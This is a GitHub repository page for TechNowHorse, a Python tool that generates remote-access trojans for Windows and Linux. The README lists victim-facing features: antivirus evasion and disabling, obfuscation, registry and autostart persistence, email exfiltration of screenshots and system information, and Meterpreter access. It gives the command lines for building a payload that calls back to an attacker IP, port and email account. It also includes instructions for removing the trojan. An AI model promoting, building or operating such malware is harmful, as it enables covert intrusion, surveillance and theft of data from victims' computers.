Skip to content
TechNowHorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.
Python Shell Batchfile
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
img
LICENSE
README.md
RemoveTechnowHorse.bat
banners.py
encrypt_code.py
installer_linux.sh
paygen.py
payload.py
requirements.txt
updater.py
version.txt

README.md

TechNowHorse

TechNowHorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.

                    This small python script can do really awesome work.

Disclaimer

💻 This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

  • Works on Windows/Linux
  • Notify New Victim Via Email
  • Undetectable
  • Does not require root or admin privileges
  • Persistence
  • Sends Screenshot of Victim PC's Screen via email
  • Give Full Meterpreter Access to Attacker
  • Didn't ever require metesploit installed to create trojan
  • Creates Executable Binary With Zero Dependencies
  • Create less size ~ 5mb payload with advance functionality
  • Obfusticate the Payload before Compiling it, hence Bypassing few more antivirus
  • Generated Payload is Encrypted with base64, hence makes extremely difficult to reverse engineer the payload
  • Function to Kill Antivirus on Victim PC and tries to disable the Security Center
  • Awesome Colourful Interface to generate payload
  • On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them

Tested On

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Following is the limitations of meterpreter payload generated using metasploit:-

  • Have to run the Metasploit Listener before executing backdoor
  • Backdoor itself don't become persistence, we have to use the post exploitation modules in order to make backdoor persistence. And post exploitation modules can only be used after successful exploitation.
  • Didn't Notify us whenever payload get executed on new system.

We all know how powerful the Meterpeter payload is but still the payload made from it is not satisfactory.

Following are the features of this payload generator which will give you a good idea of this python script:-

  • Uses Windows registry to become persistence in windows.
  • Also manages to become persistence in linux system.
  • Payload can run on LINUX as well as WINDOWS.
  • Provide Full Access, as metasploit listener could be used as well as supports custom listener (You can Create Your Own Listener)
  • Sends Email Notification, when ever payload runs on new system, with complete system info.
  • Generates payload within 1 minute or ever less.
  • Supports all meterpreter post exploitation modules.
  • Payload Can be Created on Windows as well as Linux system.

Prerequisite

  • Python 3.X
  • Few External Modules

How To Use in Linux

# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowhorse.git

# Go into the repository
$ cd technowhorse

# Installing dependencies
$ bash installer_linux.sh

$ chmod +x paygen.py
$ ./paygen.py  --help    or   python paygen.py --help

# Making Payload/RAT
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name

How To Use in Windows

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowhorse.git

# Go into the repository
$ cd technowhorse

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open paygen.py in Text editor and Configure Line 7 "PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" "

# Getting Help Menu
$ python paygen.py --help

# Making Payload/RAT
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -w -o output_file_name

Note:- Evil File will be saved inside dist/ folder, inside technowhorse/ folder

How to Update

  • Run updater.py to Update Autmatically or Download the latest Zip from this GitHub repo
  • Note: Git Must be Installed in order to use updater.py

New Screenshots:

Getting Help

Generating payload

Also Refer These Old Images

~Old Screenshots:

Getting Help

Running paygen.py Script

When RAT runs, it adds Registry to become persistence

Makes copy of itself and saved it inside Roming

Report sended by RAT

Getting Notification From Victim PC

Contributors:

Currently this repo is maintained by me (Pushpender Singh). Owner of https://www.technowlogy.tk Website.

All contributor's pull request will be accepted if their pull request is worthy for this repo.

TODO

  • Add new features
  • Contribute GUI

Removing TechNowHorse in Windows:

Method 1:

  • Go to start, type regedit and run the first program, this will open the registry editor.
  • Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called winexplorer, right click this entry and select Delete.
  • Go to your user path > AppData > Roaming, you’ll see a file named “explorer.exe”, this is the RAT, right click > Delete.
  • Restart the System.

Method 2:

  • Run "RemoveTechnowHorse.bat" in Infected System and then restart the PC to stop the current Running Evil File.

Removing TechNowHorse in Linux:

  • Open Autostart file with any text editor, Autostart File Path: ~/.config/autostart/xinput.desktop

  • Remove these 5 lines:

       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Note: destination_file_name is that name of evil_file which you gave to your TrojanHorse using -o parameter

  • Reboot your system and then delete the evil file stored this this below path

  • Destination Path, where TrojanHorse is stored : ~/.config/xnput

Contact

singhpushpender250@gmail.com or Contact Us

Save a Hacker from starvation

  • PayPal Me, Even 1 dollar of donation would be a great help :)
  • PayPal Address: PayPal.me/anonyindia

More Features Coming Soon...

You can’t perform that action at this time.